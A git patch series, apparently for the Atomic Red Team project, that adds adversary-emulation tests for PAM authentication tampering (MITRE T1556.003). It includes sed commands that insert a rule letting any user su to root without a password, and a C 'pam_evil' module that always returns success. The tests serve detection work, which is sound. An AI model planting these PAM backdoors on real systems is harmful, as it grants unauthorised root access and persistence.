From 665573613fd769815ffc2bd0492d3f5e1bd18537 Mon Sep 17 00:00:00 2001 From: JChamblee99 Date: Thu, 12 Aug 2021 17:21:15 +0000 Subject: [PATCH 1/3] Added 2 tests for T1556.003 --- atomics/T1556.003/T1556.003.yaml | 82 ++++++++++++++++++++++++++++++++ atomics/T1556.003/src/pam_evil.c | 9 ++++ 2 files changed, 91 insertions(+) create mode 100644 atomics/T1556.003/T1556.003.yaml create mode 100644 atomics/T1556.003/src/pam_evil.c diff --git a/atomics/T1556.003/T1556.003.yaml b/atomics/T1556.003/T1556.003.yaml new file mode 100644 index 00000000..931fb507 --- /dev/null +++ b/atomics/T1556.003/T1556.003.yaml @@ -0,0 +1,82 @@ +attack_technique: T1556.003 +display_name: 'Modify Authentication Process: Pluggable Authentication Modules' +atomic_tests: +- name: Malicious PAM rule + description: | + Inserts a rule into a PAM config and then tests it. + + Upon successful execution, this test will insert a rule that allows every user to su to root without a password. + supported_platforms: + - linux + input_arguments: + path_to_pam_conf: + description: PAM config file to modify. + type: string + default: /etc/pam.d/su-l + pam_rule: + description: Rule to add to the PAM config. + type: string + default: auth sufficient pam_succeed_if.so uid >= 0 + index: + description: Index where the rule is inserted. + type: integer + default: 1 + test_command: + description: Command used to test the PAM config. + type: string + default: echo "id" | su -l + executor: + name: sh + elevation_required: true + command: | + sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} + #{test_command} + cleanup_command: | + sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} +- name: Malicious PAM module + description: | + Creates a PAM module, inserts a rule to use it, and then tests it. + + Upon successful execution, this test will create a PAM module that allows every user to su to root without a password. + supported_platforms: + - linux + input_arguments: + path_to_pam_conf: + description: PAM config file to modify. + type: string + default: /etc/pam.d/su-l + pam_rule: + description: Rule to add to the PAM config. + type: string + default: auth sufficient /tmp/pam_evil.so + index: + description: Index where the rule is inserted. + type: integer + default: 1 + test_command: + description: Command used to test the PAM config. + type: string + default: echo "id" | su -l + path_to_pam_module_source: + description: Path to PAM module source code. + type: path + default: PathToAtomicsFolder/T1556.003/src/pam_evil.c + path_to_pam_module: + description: Path to PAM module object + type: path + default: /tmp/pam_evil.so + dependencies: + - description: | + The PAM module must exist on disk at specified location (#{path_to_pam_module}) + prereq_command: | + if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi; + get_prereq_command: | + sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source} + executor: + name: sh + elevation_required: true + command: | + sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} + #{test_command} + cleanup_command: | + sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} diff --git a/atomics/T1556.003/src/pam_evil.c b/atomics/T1556.003/src/pam_evil.c new file mode 100644 index 00000000..30b97174 --- /dev/null +++ b/atomics/T1556.003/src/pam_evil.c @@ -0,0 +1,9 @@ +#include + +PAM_EXTERN int pam_sm_setcred( pam_handle_t *pamh, int flags, int argc, const char **argv ) { + return PAM_SUCCESS; +} + +PAM_EXTERN int pam_sm_authenticate(pam_handle_t *pamh, int flags,int argc, const char **argv) { + return PAM_SUCCESS; +} From a190c3d9c69be7de1338173ae7e0b1b2df47e858 Mon Sep 17 00:00:00 2001 From: JChamblee99 Date: Thu, 12 Aug 2021 18:24:53 +0000 Subject: [PATCH 2/3] Added dependency check for PAM development library --- atomics/T1556.003/T1556.003.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/atomics/T1556.003/T1556.003.yaml b/atomics/T1556.003/T1556.003.yaml index 931fb507..8ffe2efa 100644 --- a/atomics/T1556.003/T1556.003.yaml +++ b/atomics/T1556.003/T1556.003.yaml @@ -66,6 +66,12 @@ atomic_tests: type: path default: /tmp/pam_evil.so dependencies: + - description: | + The PAM development library must be installed to build the PAM module + prereq_command: | + if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi; + get_prereq_command: | + if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi - description: | The PAM module must exist on disk at specified location (#{path_to_pam_module}) prereq_command: | From 3864732322308e18b7208b049f8f66a2b5a14f9f Mon Sep 17 00:00:00 2001 From: JChamblee99 Date: Sat, 14 Aug 2021 05:31:37 +0000 Subject: [PATCH 3/3] Removed test_command to resemble other atomic tests --- atomics/T1556.003/T1556.003.yaml | 10 ---------- 1 file changed, 10 deletions(-) diff --git a/atomics/T1556.003/T1556.003.yaml b/atomics/T1556.003/T1556.003.yaml index 8ffe2efa..1c523b12 100644 --- a/atomics/T1556.003/T1556.003.yaml +++ b/atomics/T1556.003/T1556.003.yaml @@ -21,16 +21,11 @@ atomic_tests: description: Index where the rule is inserted. type: integer default: 1 - test_command: - description: Command used to test the PAM config. - type: string - default: echo "id" | su -l executor: name: sh elevation_required: true command: | sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} - #{test_command} cleanup_command: | sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} - name: Malicious PAM module @@ -53,10 +48,6 @@ atomic_tests: description: Index where the rule is inserted. type: integer default: 1 - test_command: - description: Command used to test the PAM config. - type: string - default: echo "id" | su -l path_to_pam_module_source: description: Path to PAM module source code. type: path @@ -83,6 +74,5 @@ atomic_tests: elevation_required: true command: | sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} - #{test_command} cleanup_command: | sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}